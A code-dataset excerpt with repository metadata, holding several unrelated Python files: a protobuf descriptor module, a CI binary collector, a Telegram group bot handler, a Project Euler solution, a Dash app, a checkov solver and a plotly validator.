name='title', full_name='Preloads.Preload.title', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='icon', full_name='Preloads.Preload.icon', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='deliveryToken', full_name='Preloads.Preload.deliveryToken', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='installLocation', full_name='Preloads.Preload.installLocation', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='size', full_name='Preloads.Preload.size', index=6,
number=7, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=43,
serialized_end=209,
)
_PRELOADSRESPONSE = _descriptor.Descriptor(
name='PreloadsResponse',
full_name='Preloads.PreloadsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='configPreload', full_name='Preloads.PreloadsResponse.configPreload', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='appPreload', full_name='Preloads.PreloadsResponse.appPreload', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=211,
serialized_end=310,
)
_PRELOAD.fields_by_name['docid'].message_type = common__pb2._DOCID
_PRELOAD.fields_by_name['icon'].message_type = common__pb2._IMAGE
_PRELOADSRESPONSE.fields_by_name['configPreload'].message_type = _PRELOAD
_PRELOADSRESPONSE.fields_by_name['appPreload'].message_type = _PRELOAD
DESCRIPTOR.message_types_by_name['Preload'] = _PRELOAD
DESCRIPTOR.message_types_by_name['PreloadsResponse'] = _PRELOADSRESPONSE
Preload = _reflection.GeneratedProtocolMessageType('Preload', (_message.Message,), dict(
DESCRIPTOR = _PRELOAD,
__module__ = 'preloads_pb2'
# @@protoc_insertion_point(class_scope:Preloads.Preload)
))
_sym_db.RegisterMessage(Preload)
PreloadsResponse = _reflection.GeneratedProtocolMessageType('PreloadsResponse', (_message.Message,), dict(
DESCRIPTOR = _PRELOADSRESPONSE,
__module__ = 'preloads_pb2'
# @@protoc_insertion_point(class_scope:Preloads.PreloadsResponse)
))
_sym_db.RegisterMessage(PreloadsResponse)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n com.google.android.finsky.protosB\010Preloads'))
# @@protoc_insertion_point(module_scope)
| 38.084337 | 620 | 0.744543 |
a53ce7be6195464150bdfe487b473ae69a89da71 | 4,940 | py | Python | gitlab-ci/src/artifacts/collector.py | contropist/ic | 9240bea7dc0239fcbc5d43ad11f3ca803ee9bb11 | [
"Apache-2.0"
] | null | null | null | gitlab-ci/src/artifacts/collector.py | contropist/ic | 9240bea7dc0239fcbc5d43ad11f3ca803ee9bb11 | [
"Apache-2.0"
] | 4 | 2021-12-22T22:34:51.000Z | 2022-03-31T07:34:19.000Z | gitlab-ci/src/artifacts/collector.py | contropist/ic | 9240bea7dc0239fcbc5d43ad11f3ca803ee9bb11 | [
"Apache-2.0"
] | null | null | null | import logging
import multiprocessing
import os
import shutil
import tempfile
from os import path
from typing import List
from ci import cwd
from ci import ENV
from ci import log_section
from ci import mkdir_p
from ci import sh
def local(v: str) -> str:
return path.join(ENV.top, "gitlab-ci/src/artifacts", v)
RUST_BINARIES = [
"boundary-node-control-plane",
"boundary-node-prober",
"canister_sandbox",
"e2e-test-driver",
"ic-admin",
"ic-btc-adapter",
"ic-canister-http-adapter",
"ic-consensus-pool-util",
"ic-crypto-csp",
"ic-cup-explorer",
"ic-get-neuron-ids",
"ic-nns-init",
"ic-p8s-service-discovery",
"ic-p8s-sd",
"ic-prep",
"ic-recovery",
"ic-regedit",
"ic-replay",
"ic-rosetta-api",
"ic-starter",
"ic-test-bin",
"ic-workload-generator",
"orchestrator",
"prod-test-driver",
"replica",
"sandbox_launcher",
"state-tool",
"system-tests",
"vsock_agent",
]
DONT_STRIP = ["replica", "canister_sandbox", "ic-crypto-csp"]
STRIP_REFS = {
"x86_64-unknown-linux-gnu": [
"*-glibc-*",
"*-gcc-*",
"*-openssl-*",
"*-libidn2-*",
"*-binutils-*",
"*-crates-io",
],
"x86_64-apple-darwin": ["*-crates-io", "*-swift-corefoundation", "*-openssl-*"],
}
class Collector:
"""A script that collects a list of binaries, performs various transformations on them (see below), and puts them in `ARTIFACTS_DIR` so GitLab can detect and upload them."""
artifacts_dir: str
files: List[str]
def __init__(
self,
artifacts_dir="artifacts/nix-release",
files=RUST_BINARIES,
) -> None:
self.artifacts_dir = artifacts_dir
self.files = files
self.temp = tempfile.mkdtemp()
@classmethod
def collect(cls, artifacts_dir="artifacts/nix-release", files=RUST_BINARIES):
with log_section("Click here to see artifact processing output"):
cls(artifacts_dir, files).run()
def run(self):
with cwd(ENV.top):
# This is the directory GitLab searches for artifacts once the job has completed
self.out_dir = path.join(ENV.top, self.artifacts_dir)
mkdir_p(self.out_dir)
p = multiprocessing.Pool()
try:
p.map(self._process_one, self.files)
except KeyboardInterrupt:
p.terminate()
p.join()
raise
if "malicious" in self.artifacts_dir:
return
if path.exists("/openssl/private.pem"):
sh(local("openssl-sign.sh"), self.out_dir)
else:
logging.warn("/openssl/private.pem doesn't exist, so these artifacts won't be signed")
def _process_one(self, binary: str):
"""
Things we do in here:.
* Strip debuginfo from the binaries (using objcopy or strip)
* On Linux, run patchelf, so binaries built in nix-shell can run on other systems
* On Darwin, fix dylibs, which accomplishes the same goal as the previous bullet point
* If REALLY_STRIP is set, strip Nix store references and fail if there are any we don't recognize (disabled right now because the nix shell path ends up in every rpath for some reason)
"""
src_path = path.join(ENV.target_dir, ENV.build_target, "release", binary)
bin_path = path.join(self.temp, binary)
if not os.access(src_path, os.R_OK):
logging.info(f"Binary not found at {src_path}")
return
shutil.copyfile(src_path, bin_path)
if binary not in DONT_STRIP:
self._strip_and_clean(bin_path)
else:
self._clean(bin_path)
self._adjust_paths(bin_path)
self._strip_refs(bin_path)
sh("pigz", "-c", "--no-name", bin_path, pipe_to=path.join(self.out_dir, f"{binary}.gz"))
def _clean(self, in_path: str):
if ENV.is_linux:
sh("objcopy", "-D", "-R", ".comment", "-R", ".note.gnu.build-id", in_path)
def _strip_and_clean(self, in_path: str):
if ENV.is_linux:
sh("objcopy", "-D", "--strip-debug", "-R", ".comment", "-R", ".note.gnu.build-id", in_path)
elif ENV.is_macos:
sh("strip", "-S", in_path)
def _adjust_paths(self, in_path: str):
if ENV.is_linux:
sh(
"patchelf",
"--remove-rpath",
"--set-interpreter",
"/lib64/ld-linux-x86-64.so.2",
in_path,
)
else:
sh(local("relocate-darwin-syslibs.sh"), in_path)
def _strip_refs(self, in_path: str):
if "REALLY_STRIP" in os.environ:
sh(
local("strip-references.sh"),
in_path,
env={"allowedStrippedRefs": " ".join(STRIP_REFS[ENV.build_target])},
)
| 29.580838 | 192 | 0.582996 |
e2bfae6a42130b5e6e21aa1cdd6d320cb6f9251b | 15,006 | py | Python | handlers/all.py | hidarr/GANA | 36840fbf539a51bf68cd42f4d8b74524df6d97fa | [
"MIT"
] | null | null | null | handlers/all.py | hidarr/GANA | 36840fbf539a51bf68cd42f4d8b74524df6d97fa | [
"MIT"
] | null | null | null | handlers/all.py | hidarr/GANA | 36840fbf539a51bf68cd42f4d8b74524df6d97fa | [
"MIT"
] | null | null | null | from utlis.rank import setrank,isrank,remrank,remsudos,setsudo, GPranks,IDrank
from utlis.send import send_msg, BYusers, GetLink,Name,Glang,getAge
from utlis.locks import st,getOR
from utlis.tg import Bot
from config import *
from pyrogram.types import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton
import threading, requests, time, random, re, json, datetime
import importlib
from os import listdir
from os.path import isfile, join
def allGP(client, message,redis):
type = message.chat.type
userID = message.from_user.id
chatID = message.chat.id
username = message.from_user.username
if username is None:
username = "None"
userFN = message.from_user.first_name
title = message.chat.title
rank = isrank(redis,userID,chatID)
text = message.text
c = importlib.import_module("lang.arcmd")
r = importlib.import_module("lang.arreply")
redis.hincrby("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID)
if text :
if re.search(c.setGPadmin,text):
if re.search("@",text):
user = text.split("@")[1]
if re.search(c.setGPadmin2,text):
user = int(re.search(r'\d+', text).group())
if message.reply_to_message:
user = message.reply_to_message.from_user.id
if 'user' not in locals():return False
if GPranks(userID,chatID) == "member":return False
Getus = Bot("getChatMember",{"chat_id":chatID,"user_id":userID})["result"]
if Getus["status"] == "administrator" and not Getus["can_promote_members"]:return False
try:
getUser = client.get_users(user)
userId = getUser.id
userFn = getUser.first_name
if GPranks(userId,chatID) != "member":return False
pr = Bot("promoteChatMember",{"chat_id":chatID,"user_id":userId,"can_change_info":1,"can_delete_messages":1,"can_invite_users":1,"can_restrict_members":1,"can_pin_messages":1})
if pr["ok"]:
T ="<a href=\"tg://user?id={}\">{}</a>".format(userId,Name(userFn))
Bot("sendMessage",{"chat_id":chatID,"text":r.prGPadmin.format(T),"reply_to_message_id":message.message_id,"parse_mode":"html"})
except Exception as e:
Bot("sendMessage",{"chat_id":chatID,"text":r.userNocc,"reply_to_message_id":message.message_id,"parse_mode":"html"})
if re.search(c.sors,text):
kb = InlineKeyboardMarkup([[InlineKeyboardButton("قناه السورس 📢", url="t.me/EEFFI")],[InlineKeyboardButton("بوت التواصل 💬", url="t.me/F96BOT")],[InlineKeyboardButton("المطور 💜", url="t.me/Eiitk")]])
Botuser = client.get_me().username
Bot("sendMessage",{"chat_id":chatID,"text":r.sors.format("@"+Botuser),"disable_web_page_preview":True,"reply_to_message_id":message.message_id,"parse_mode":"markdown","reply_markup":kb})
if re.search(c.dellink,text):
kb = InlineKeyboardMarkup([[InlineKeyboardButton(c.dellink2, url="https://telegram.org/deactivate")]])
Botuser = client.get_me().username
Bot("sendMessage",{"chat_id":chatID,"text":r.dellink,"disable_web_page_preview":True,"reply_to_message_id":message.message_id,"parse_mode":"markdown","reply_markup":kb})
if re.search(c.ShowO,text) and (rank is not False or rank is not 0 or rank != "vip"):
reply_markup = getOR(rank,r,userID)
Bot("sendMessage",{"chat_id":chatID,"text":r.Showall,"reply_to_message_id":message.message_id,"parse_mode":"html","disable_web_page_preview":True,"reply_markup":reply_markup})
if text == "عدد الكروب" and (rank is not False or rank is not 0 ):
from pyrogram.api.functions.channels import GetFullChannel
chat = client.resolve_peer(chatID)
full_chat = client.send(GetFullChannel(channel=chat)).full_chat
Bot("sendMessage",{"chat_id":chatID,"text":r.gpinfo.format(message.chat.title,full_chat.participants_count,full_chat.admins_count,full_chat.kicked_count,full_chat.banned_count,message.message_id),"reply_to_message_id":message.message_id,"parse_mode":"html","disable_web_page_preview":True})
if text == c.ID and not redis.sismember("{}Nbot:IDSend".format(BOT_ID),chatID) and not message.reply_to_message:
Ch = True
# if redis.sismember("{}Nbot:IDpt".format(BOT_ID),chatID):
t = IDrank(redis,userID,chatID,r)
msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID) or 0)
edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),userID) or 0)
rate = int(msgs)*100/20000
age = getAge(userID,r)
if redis.hget("{}Nbot:SHOWid".format(BOT_ID),chatID):
tx = redis.hget("{}Nbot:SHOWid".format(BOT_ID),chatID)
rep = {"#age":"{age}","#name":"{name}","#id":"{id}","#username":"{username}","#msgs":"{msgs}","#stast":"{stast}","#edits":"{edits}","#rate":"{rate}","{us}":"{username}","#us":"{username}"}
for v in rep.keys():
tx = tx.replace(v,rep[v])
else:
tx = r.IDnPT
if not redis.sismember("{}Nbot:IDSendPH".format(BOT_ID),chatID):
get = Bot("getUserProfilePhotos",{"user_id":userID,"offset":0,"limit":1})
if get["ok"] == False:
Ch = True
elif get["result"]["total_count"] == 0:
Ch = True
else:
Ch = False
file_id = get["result"]["photos"][0][0]["file_id"]
Bot("sendPhoto",{"chat_id":chatID,"photo":file_id,"caption":tx.format(username=("@"+username or "None"),id=userID,stast=t,msgs=msgs,edits=edits,age=age,rate=str(rate)+"%"),"reply_to_message_id":message.message_id,"parse_mode":"html"})
if Ch == True:
Bot("sendMessage",{"chat_id":chatID,"text":tx.format(username=("@"+username or "None"),id=userID,stast=t,msgs=msgs,edits=edits,age=age,rate=str(rate)+"%"),"reply_to_message_id":message.message_id,"parse_mode":"html"})
# if not redis.sismember("{}Nbot:IDSendPH".format(BOT_ID),chatID) and not redis.sismember("{}Nbot:IDpt".format(BOT_ID),chatID):
# get = Bot("getUserProfilePhotos",{"user_id":userID,"offset":0,"limit":1})
# if get["ok"] == False:
# Ch = True
# elif get["result"]["total_count"] == 0:
# Ch = True
# else:
# Ch = False
# reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.RIDPHs,callback_data=json.dumps(["ShowDateUser","",userID]))]])
# file_id = get["result"]["photos"][0][0]["file_id"]
# Bot("sendPhoto",{"chat_id":chatID,"photo":file_id,"caption":r.RID.format(userID),"reply_to_message_id":message.message_id,"parse_mode":"html","reply_markup":reply_markup})
# if Ch == True and not redis.sismember("{}Nbot:IDpt".format(BOT_ID),chatID):
# reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.RIDPHs,callback_data=json.dumps(["ShowDateUser","",userID]))]])
# Bot("sendMessage",{"chat_id":chatID,"text":r.RID.format(userID),"reply_to_message_id":message.message_id,"parse_mode":"html","reply_markup":reply_markup})
if text == "رتبتي":
t = IDrank(redis,userID,chatID,r)
Bot("sendMessage",{"chat_id":chatID,"text":f"⏏️꒐ رتبتك : {t}","reply_to_message_id":message.message_id,"parse_mode":"html"})
if text == c.ID and not redis.sismember("{}Nbot:IDSend".format(BOT_ID),chatID) and message.reply_to_message:
us = message.reply_to_message.from_user.id
rusername = message.reply_to_message.from_user.username
if rusername is None:
rusername = "None"
t = IDrank(redis,us,chatID,r)
msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),us) or 0)
edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),us) or 0)
rate = int(msgs)*100/20000
age = getAge(us,r)
tx = r.ReIDnPT
Bot("sendMessage",{"chat_id":chatID,"text":tx.format(Reus=("@"+rusername or "None"),ReID=us,Rerank=t,Remsgs=msgs,Reedits=edits,Rage=age,Rerate=str(rate)+"%"),"reply_to_message_id":message.message_id,"parse_mode":"html"})
if re.search(c.idus,text) and not redis.sismember("{}Nbot:IDSend".format(BOT_ID),chatID):
user = text.split("@")[1]
try:
getUser = client.get_users(user)
us = getUser.id
rusername = user
if rusername is None:
rusername = "None"
age = getAge(us,r)
t = IDrank(redis,us,chatID,r)
msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),us) or 0)
edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),us) or 0)
rate = int(msgs)*100/20000
tx = r.ReIDnPT
Bot("sendMessage",{"chat_id":chatID,"text":tx.format(Reus=("@"+rusername or "None"),ReID=us,Rerank=t,Remsgs=msgs,Reedits=edits,Rage=age,Rerate=str(rate)+"%"),"reply_to_message_id":message.message_id,"parse_mode":"html"})
except Exception as e:
print(e)
if re.search(c.ShowSudos, text):
tx = (redis.get("{}Nbot:SHOWsudos".format(BOT_ID)) or "")
Bot("sendMessage",{"chat_id":chatID,"text":tx,"reply_to_message_id":message.message_id,"parse_mode":"html"})
if text == c.mymsgs:
get = redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID)
Bot("sendMessage",{"chat_id":chatID,"text":r.yourmsgs.format((get or 0)),"reply_to_message_id":message.message_id,"parse_mode":"html"})
if text == c.link and not redis.sismember("{}Nbot:showlink".format(BOT_ID),chatID):
get = (redis.hget("{}Nbot:links".format(BOT_ID),chatID) or GetLink(chatID) or "none")
Bot("sendMessage",{"chat_id":chatID,"text":r.showGPlk.format(get),"reply_to_message_id":message.message_id,"parse_mode":"html","disable_web_page_preview":True})
if text == c.myedits:
get = redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),userID)
Bot("sendMessage",{"chat_id":chatID,"text":r.youredits.format((get or 0)),"reply_to_message_id":message.message_id,"parse_mode":"html"})
if text == c.myaddcontact:
get = redis.hget("{}Nbot:{}:addcontact".format(BOT_ID,chatID),userID)
Bot("sendMessage",{"chat_id":chatID,"text":r.youraddcontact.format((get or 0)),"reply_to_message_id":message.message_id,"parse_mode":"html"})
if not redis.sismember("{}Nbot:ReplySendBOT".format(BOT_ID),chatID):
if redis.hexists("{}Nbot:TXreplys".format(BOT_ID),text):
tx = redis.hget("{}Nbot:TXreplys".format(BOT_ID),text)
try:
rep = {"#cn":"{cn}","#age":"{age}","#fn":"{fn}","#id":"{id}","#username":"{username}","#msgs":"{msgs}","#stast":"{stast}","#edits":"{edits}","#rate":"{rate}","{us}":"{username}","#us":"{username}"}
for v in rep.keys():
tx = tx.replace(v,rep[v])
Bot("sendMessage",{"chat_id":chatID,"text":tx.format(fn=userFN,username=("@"+username or "n"),id=userID,stast=IDrank(redis,userID,chatID,r),cn=title),"reply_to_message_id":message.message_id,"parse_mode":"html"})
except Exception as e:
Bot("sendMessage",{"chat_id":chatID,"text":tx,"reply_to_message_id":message.message_id,"parse_mode":"html"})
if redis.hexists("{}Nbot:STreplys".format(BOT_ID),text):
ID = redis.hget("{}Nbot:STreplys".format(BOT_ID),text)
Bot("sendSticker",{"chat_id":chatID,"sticker":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:GFreplys".format(BOT_ID),text):
ID = redis.hget("{}Nbot:GFreplys".format(BOT_ID),text)
Bot("sendanimation",{"chat_id":chatID,"animation":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:{}:VOreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:VOreplys".format(BOT_ID),text)
Bot("sendvoice",{"chat_id":chatID,"voice":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:PHreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:PHreplys".format(BOT_ID),text)
Bot("sendphoto",{"chat_id":chatID,"photo":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:DOreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:DOreplys".format(BOT_ID),text)
Bot("sendDocument",{"chat_id":chatID,"document":ID,"reply_to_message_id":message.message_id})
if not redis.sismember("{}Nbot:ReplySend".format(BOT_ID),chatID):
if redis.hexists("{}Nbot:{}:TXreplys".format(BOT_ID,chatID),text):
tx = redis.hget("{}Nbot:{}:TXreplys".format(BOT_ID,chatID),text)
try:
rep = {"#cn":"{cn}","#age":"{age}","#fn":"{fn}","#id":"{id}","#username":"{username}","#msgs":"{msgs}","#stast":"{stast}","#edits":"{edits}","#rate":"{rate}","{us}":"{username}","#us":"{username}"}
for v in rep.keys():
tx = tx.replace(v,rep[v])
Bot("sendMessage",{"chat_id":chatID,"text":tx.format(fn=userFN,username=("@"+username or "n"),id=userID,stast=IDrank(redis,userID,chatID,r),cn=title),"reply_to_message_id":message.message_id,"parse_mode":"html"})
except Exception as e:
Bot("sendMessage",{"chat_id":chatID,"text":tx,"reply_to_message_id":message.message_id,"parse_mode":"html"})
if redis.hexists("{}Nbot:{}:STreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:{}:STreplys".format(BOT_ID,chatID),text)
Bot("sendSticker",{"chat_id":chatID,"sticker":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:{}:GFreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:{}:GFreplys".format(BOT_ID,chatID),text)
Bot("sendanimation",{"chat_id":chatID,"animation":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:{}:VOreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:{}:VOreplys".format(BOT_ID,chatID),text)
Bot("sendvoice",{"chat_id":chatID,"voice":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:{}:AUreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:{}:AUreplys".format(BOT_ID,chatID),text)
Bot("sendaudio",{"chat_id":chatID,"audio":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:{}:PHreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:{}:PHreplys".format(BOT_ID,chatID),text)
Bot("sendphoto",{"chat_id":chatID,"photo":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:{}:DOreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:{}:DOreplys".format(BOT_ID,chatID),text)
Bot("sendDocument",{"chat_id":chatID,"document":ID,"reply_to_message_id":message.message_id})
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateMsgs,args=(client, message,redis))
t.daemon = True
t.start()
importlib.reload(U)
except Exception as e:
import traceback
traceback.print_exc()
print(e)
pass
| 59.312253 | 296 | 0.653672 |
a2f09d8d3eee23a4b0bf042eb380c201b6d993fd | 443 | py | Python | Solutions/Problem_069.py | PraneethJain/Project-Euler | 54fe34da444803ea55c49e4a4cda3ad6d4bca3b8 | [
"MIT"
] | 2 | 2022-03-11T21:31:52.000Z | 2022-03-11T21:37:14.000Z | Solutions/Problem_069.py | PraneethJain/Project-Euler-100 | 54fe34da444803ea55c49e4a4cda3ad6d4bca3b8 | [
"MIT"
] | null | null | null | Solutions/Problem_069.py | PraneethJain/Project-Euler-100 | 54fe34da444803ea55c49e4a4cda3ad6d4bca3b8 | [
"MIT"
] | 1 | 2022-03-07T12:55:36.000Z | 2022-03-07T12:55:36.000Z | from time import time
from prime import primelist
t1 = time()
prime_list = primelist(20)
product = 1
i = 0
while product * prime_list[i] < 10**6:
product *= prime_list[i]
i += 1
print(product)
print(f"Process completed in {time()-t1}s")
# from sympy import totient as phi
# high=0
# ans=0
# for i in range(10**5,10**6):
# current=i/phi(i)
# print(i)
# if current>high:
# high=current
# ans=i
# print(ans)
| 18.458333 | 43 | 0.620767 |
f87d9e1590aa30b5506c946b6ef63b07c55a4d29 | 3,267 | py | Python | run.py | pflee1989/kickstarter_dash | e3909b15b827b8da4e8b96210d7b8b733a809045 | [
"MIT"
] | null | null | null | run.py | pflee1989/kickstarter_dash | e3909b15b827b8da4e8b96210d7b8b733a809045 | [
"MIT"
] | null | null | null | run.py | pflee1989/kickstarter_dash | e3909b15b827b8da4e8b96210d7b8b733a809045 | [
"MIT"
] | null | null | null | # Imports from 3rd party libraries
# from joblib import load
# pipeline = load('assets/pipeline_joblib')
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
# Imports from this application
from app import app, server
from pages import index, predictions, insights, process
# Navbar docs: https://dash-bootstrap-components.opensource.faculty.ai/l/components/navbar
navbar = dbc.NavbarSimple(
brand='Kickstarter Success',
brand_href='/',
children=[
dbc.NavItem(dcc.Link('Predictions', href='/Predictions', className='nav-link')),
dbc.NavItem(dcc.Link('Insights', href='/Insights', className='nav-link')),
dbc.NavItem(dcc.Link('Process', href='/Process', className='nav-link')),
# dbc.NavItem(dcc.Link('Result', href='/Result', className='nav-link'))
],
sticky='top',
color='light',
light=True,
dark=False
)
# Footer docs:
# dbc.Container, dbc.Row, dbc.Col: https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout
# html.P: https://dash.plot.ly/dash-html-components
# fa (font awesome) : https://fontawesome.com/icons/github-square?style=brands
# mr (margin right) : https://getbootstrap.com/docs/4.3/utilities/spacing/
# className='lead' : https://getbootstrap.com/docs/4.3/content/typography/#lead
footer = dbc.Container(
dbc.Row(
dbc.Col(
html.P(
[
html.Span('Philip Lee', className='mr-2'),
html.A(html.I(className='fab fa-linkedin mr-1'), href='https://www.linkedin.com/in/pflee/'),
html.A(html.I(className='fas fa-envelope-square mr-1'), href='mailto:pflee1989@outlook.com'),
# html.A(html.I(className='fab fa-github-square mr-1'), href='https://github.com/pflee1989/VideoGameRating1.git'),
# html.A(html.I(className='fab fa-medium'), href='https://philipfeiranlee.medium.com/video-game-rating-trying-to-simulate-whats-in-the-head-of-the-raters-165c6cf73d16'),
],
className='lead'
)
)
)
)
# Layout docs:
# html.Div: https://dash.plot.ly/getting-started
# dcc.Location: https://dash.plot.ly/dash-core-components/location
# dbc.Container: https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout
app.layout = html.Div([
dcc.Location(id='url', refresh=False),
navbar,
dbc.Container(id='page-content', className='mt-4'),
html.Hr(),
footer
])
# URL Routing for Multi-Page Apps: https://dash.plot.ly/urls
@app.callback(Output('page-content', 'children'),
[Input('url', 'pathname')])
def display_page(pathname):
if pathname == '/':
return index.layout
elif pathname == '/Predictions':
return predictions.layout
elif pathname == '/Insights':
return insights.layout
elif pathname == '/Process':
return process.layout
# elif pathname == '/Result':
# return Result.layout
else:
return dcc.Markdown('## Page not found')
# Run app server: https://dash.plot.ly/getting-started
if __name__ == '__main__':
app.run_server(debug=True) | 37.988372 | 190 | 0.654729 |
aee901c9c24ec698b8a8917370a77e88df07e83c | 823 | py | Python | checkov/common/checks_infra/solvers/complex_solvers/or_solver.py | peaudecastor/checkov | a4804b61c1b1390b7abd44ab53285fcbc3e7e80b | [
"Apache-2.0"
] | null | null | null | checkov/common/checks_infra/solvers/complex_solvers/or_solver.py | peaudecastor/checkov | a4804b61c1b1390b7abd44ab53285fcbc3e7e80b | [
"Apache-2.0"
] | null | null | null | checkov/common/checks_infra/solvers/complex_solvers/or_solver.py | peaudecastor/checkov | a4804b61c1b1390b7abd44ab53285fcbc3e7e80b | [
"Apache-2.0"
] | null | null | null | from typing import List, Any, Dict
from checkov.common.graph.checks_infra.enums import Operators
from checkov.common.graph.checks_infra.solvers.base_solver import BaseSolver
from checkov.common.checks_infra.solvers.complex_solvers.base_complex_solver import BaseComplexSolver
from functools import reduce
from operator import or_
class OrSolver(BaseComplexSolver):
operator = Operators.OR
def __init__(self, solvers: List[BaseSolver], resource_types: List[str]) -> None:
super().__init__(solvers, resource_types)
def _get_operation(self, *args: Any, **kwargs: Any) -> Any:
return reduce(or_, args)
def get_operation(self, vertex: Dict[str, Any]) -> bool:
for solver in self.solvers:
if solver.get_operation(vertex):
return True
return False
| 34.291667 | 101 | 0.730255 |
a43915027ecc7cf6ccfd9cbe6db057a711e16f15 | 406 | py | Python | main.py | NikoFresh/news_diff | 70295c5df80b34a315acf1fdf6747ac3510a2098 | [
"MIT"
] | null | null | null | main.py | NikoFresh/news_diff | 70295c5df80b34a315acf1fdf6747ac3510a2098 | [
"MIT"
] | null | null | null | main.py | NikoFresh/news_diff | 70295c5df80b34a315acf1fdf6747ac3510a2098 | [
"MIT"
] | null | null | null | import asyncio
import logging
from config import Config
from src.models import db_setup
from src.start import start
logging.basicConfig(
level=Config.LOG_LEVEL, format="%(name)s - %(levelname)s - %(message)s"
)
async def main() -> None:
db_setup()
while True:
start(Config.RSS_URL)
await asyncio.sleep(Config.SLEEP_TIME)
if __name__ == "__main__":
asyncio.run(main())
| 18.454545 | 75 | 0.692118 |
787e178e1ca0f4e872dbfa380036e57d501e933f | 498 | py | Python | Lib/site-packages/plotly/validators/scatter/marker/colorbar/title/_text.py | tytanya/my-first-blog | 2b40adb0816c3546e90ad6ca1e7fb50d924c1536 | [
"bzip2-1.0.6"
] | 12 | 2020-04-18T18:10:22.000Z | 2021-12-06T10:11:15.000Z | plotly/validators/scatter/marker/colorbar/title/_text.py | Vesauza/plotly.py | e53e626d59495d440341751f60aeff73ff365c28 | [
"MIT"
] | 27 | 2020-04-28T21:23:12.000Z | 2021-06-25T15:36:38.000Z | plotly/validators/scatter/marker/colorbar/title/_text.py | Vesauza/plotly.py | e53e626d59495d440341751f60aeff73ff365c28 | [
"MIT"
] | 6 | 2020-04-18T23:07:08.000Z | 2021-11-18T07:53:06.000Z | import _plotly_utils.basevalidators
class TextValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(
self,
plotly_name='text',
parent_name='scatter.marker.colorbar.title',
**kwargs
):
super(TextValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop('edit_type', 'colorbars'),
role=kwargs.pop('role', 'info'),
**kwargs
)
| 26.210526 | 66 | 0.608434 |
2b2c2a4b06a790091560afb220e62c0c298cf1ec | 1,517 | py | Python | malware/libpeshka/libpeshka-0.6/setup.py | rsc-dev/pypi_malware | 0502c84df508d2a84b5f50dc1d4c2b66191318fa | [
"Unlicense"
